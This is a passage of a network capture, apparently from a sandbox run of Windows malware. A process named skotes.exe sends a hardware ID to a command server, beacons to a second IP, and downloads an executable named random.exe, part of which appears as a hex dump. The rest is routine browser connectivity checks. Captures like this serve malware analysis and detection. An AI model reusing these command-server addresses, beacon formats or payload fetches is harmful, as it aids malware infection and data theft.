Dec 19, 2024 10:11:36.785792112 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 35 46 35 46 37 36 31 34 43 32 38 31 37 30 31 38 37 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"F255F5F7614C2817018708------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"stok------EBAAAFBGDBKKEBGCFCBF--
Dec 19, 2024 10:11:37.425558090 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:11:37 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50098	185.215.113.43	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:36.018485069 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 37 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017485001&unit=246122658369

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	50109	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:38.830486059 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:39.917408943 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82565 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:39.979464054 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:40.293935061 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82566 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:40.826256990 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:41.155976057 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82566 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:41.327195883 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:41.643264055 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82567 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:41.972394943 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:42.300690889 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82568 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:42.560800076 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:42.891990900 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82568 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:46.236886978 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:46.551980019 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82572 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:11:56.561347008 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 19, 2024 10:11:57.752763033 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:11:58.069715023 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82583 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:02.098917007 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:02.413424015 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82588 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:08.993980885 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:09.308444977 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82595 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:10.415492058 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:10.730792046 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82596 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:19.337866068 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:19.652753115 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82605 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:29.746356964 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 19, 2024 10:12:39.149017096 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:39.467160940 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82625 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 19, 2024 10:12:40.376143932 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 19, 2024 10:12:40.692050934 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 18 Dec 2024 10:15:34 GMT Age: 82626 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	50120	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:40.192459106 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.6	50125	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:40.417339087 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50126	31.41.244.11	80	6316	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:41.178566933 CET	59	OUT	GET /files/lolz/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 19, 2024 10:11:42.524482965 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 19 Dec 2024 09:11:42 GMT Content-Type: application/octet-stream Content-Length: 21504 Last-Modified: Wed, 18 Dec 2024 18:13:28 GMT Connection: keep-alive ETag: "676310c8-5400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpm;"0J:i @ `hOTh8 H.text@I J `.rsrcL@@.relocR@BiH6p108s2(}<}=};\|<(+\|<(0P~,Brp(rcp((rp(((o(08s,(}}}\|(+\|(0Hs/+~~ioX-rp(+0rp( o!+*0rp( o!+
Dec 19, 2024 10:11:42.524723053 CET	1236	IN	Data Raw: 00 06 2a 00 00 13 30 03 00 32 00 00 00 06 00 00 11 00 02 72 ef 00 00 70 72 f7 00 00 70 28 22 00 00 0a 6f 23 00 00 0a 0a 06 06 28 03 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 28 27 00 00 0a 0b 2b 00 07 2a 00 00 1b 30 04 00 ad 00 00 00 07 00 00 11 00 Data Ascii: 02rprp("o#(+(+s&('+0s(rp( (+~%-&~s*%(+(+o-+@(.o/,%o0Xo1+o1(2-o3
Dec 19, 2024 10:11:42.524735928 CET	448	IN	Data Raw: 2b 73 26 00 00 0a 6f 40 00 00 0a 00 00 12 02 28 32 00 00 0a 2d b2 de 0f 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 07 13 04 2b 00 11 04 2a 00 00 01 10 00 00 02 00 49 00 52 9b 00 0f 00 00 00 00 13 30 04 00 b0 00 00 00 0f 00 00 11 73 28 00 00 06 Data Ascii: +s&o@(2-o3+IR0s(sM%rupoN&%rpoN&%rpoN&%rpoN&%rpoN&%rpoN&}rp( (+~%-&~%s%(+(+)sO(+
Dec 19, 2024 10:11:42.525752068 CET	1236	IN	Data Raw: 2b 00 00 06 73 5c 00 00 0a 28 0e 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 0c 2b 00 08 2a 13 30 02 00 18 00 00 00 14 00 00 11 00 28 5d 00 00 0a 0a 12 00 72 7f 02 00 70 28 5e 00 00 0a 0b 2b 00 07 2a 1b 30 07 00 d3 00 00 00 15 00 00 11 00 00 73 5f 00 Data Ascii: +s\(+(+s&+0(]rp(^+0s_%s`%rpoa%rprp(boc%od%oe%of%ogohoi&ojokolokom(>,rp((+r)p
Dec 19, 2024 10:11:42.525765896 CET	1236	IN	Data Raw: 00 00 2b 00 dd 7d 04 00 00 02 7b 2f 00 00 04 0b 02 7c 2f 00 00 04 fe 15 21 00 00 01 02 15 25 0a 7d 14 00 00 04 12 01 28 70 00 00 0a 00 72 e4 05 00 70 7e 05 00 00 04 28 1a 00 00 0a 28 19 00 00 0a 00 72 12 06 00 70 7e 06 00 00 04 28 1a 00 00 0a 28 Data Ascii: +}{/\|/!%}(prp~((rp~(({(}r@p({oy}'+J\|'(z}(rpp\|(({\|((\|?(}(\|(\|'(~-/\|'o3
Dec 19, 2024 10:11:42.526541948 CET	448	IN	Data Raw: 00 02 00 00 00 ec 04 00 00 37 00 00 00 23 05 00 00 17 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 4c 05 00 00 53 05 00 00 57 00 00 00 1e 00 00 01 06 2a 22 02 28 6e 00 00 0a 00 2a 00 1b 30 07 00 fe 01 00 00 1a 00 00 11 02 7b 30 00 00 04 0a 06 17 Data Ascii: 7#LSW"(n0{06++6++s}4,+.++M8{4{2oo(-C%}0}9\|1(+}{9\|9%}0(}6
Dec 19, 2024 10:11:42.526554108 CET	1236	IN	Data Raw: 00 02 14 7d 35 00 00 04 de 19 06 16 2f 14 02 7b 34 00 00 04 2c 0c 02 7b 34 00 00 04 6f 33 00 00 0a 00 dc 02 14 7d 34 00 00 04 00 de 29 13 04 02 11 04 7d 38 00 00 04 00 72 3e 09 00 70 02 7b 38 00 00 04 6f 59 00 00 0a 28 1a 00 00 0a 28 19 00 00 0a Data Ascii: }5/{4,{4o3}4)}8r>p{8oY((}0\|1(}0\|1(AdW&[)"(n
Dec 19, 2024 10:11:42.527354002 CET	1236	IN	Data Raw: 06 06 00 79 07 d3 0d 06 00 75 0c d3 0d 5f 00 4f 0d 00 00 06 00 63 03 2d 06 06 00 da 08 a1 0d 06 00 ac 02 d3 0d 12 00 2c 0f 3c 0c 06 00 c7 0a 4a 05 06 00 49 07 ec 0a 06 00 48 0a ec 0a 06 00 37 0f ec 0a 0a 00 e0 0f 66 0e 0a 00 50 0b 66 0e 0e 00 01 Data Ascii: yu_Oc-,<JIH7fPfL-XLC6>]JjJf^JFJJJJ-JJn:A
Dec 19, 2024 10:11:42.527365923 CET	448	IN	Data Raw: 00 e6 01 97 05 1e 00 46 2b 00 00 00 00 83 00 ae 00 8b 05 1f 00 53 2b 00 00 00 00 86 18 5a 0d 06 00 20 00 5c 2b 00 00 00 00 83 00 82 01 9d 05 20 00 6a 2b 00 00 00 00 86 18 5a 0d 06 00 21 00 73 2b 00 00 00 00 83 00 61 02 a2 05 21 00 84 2b 00 00 00 Data Ascii: F+S+Z \+ j+Z!s+a!+Z"+"+Z#+#82&#:2Z$D2$4&$4Z%4%6&%
Dec 19, 2024 10:11:42.527379036 CET	1236	IN	Data Raw: 00 01 00 9c 07 07 00 99 00 08 00 99 00 09 00 99 00 09 00 5a 0d 01 00 11 00 5a 0d 06 00 19 00 5a 0d 0a 00 29 00 5a 0d 10 00 31 00 5a 0d 10 00 39 00 5a 0d 10 00 41 00 5a 0d 10 00 49 00 5a 0d 10 00 51 00 5a 0d 10 00 59 00 5a 0d 10 00 61 00 5a 0d 15 Data Ascii: ZZZ)Z1Z9ZAZIZQZYZaZiZqZyZZZZ Z11&QZ929d89\|EqgOyTZZsy,xZyyZ
Dec 19, 2024 10:11:42.644063950 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 ad 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 17 06 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 ec 0a 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 88 04 be 07 00 00 00 00 04 00 02 00 00 00 00 Data Ascii: </@/dIKSW2YJkJoJJW./b'L<textoKebabCase>5__10<AnalizarTextoAsync

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	50127	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:41.279100895 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	50129	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 10:11:41.774353027 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	50130	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
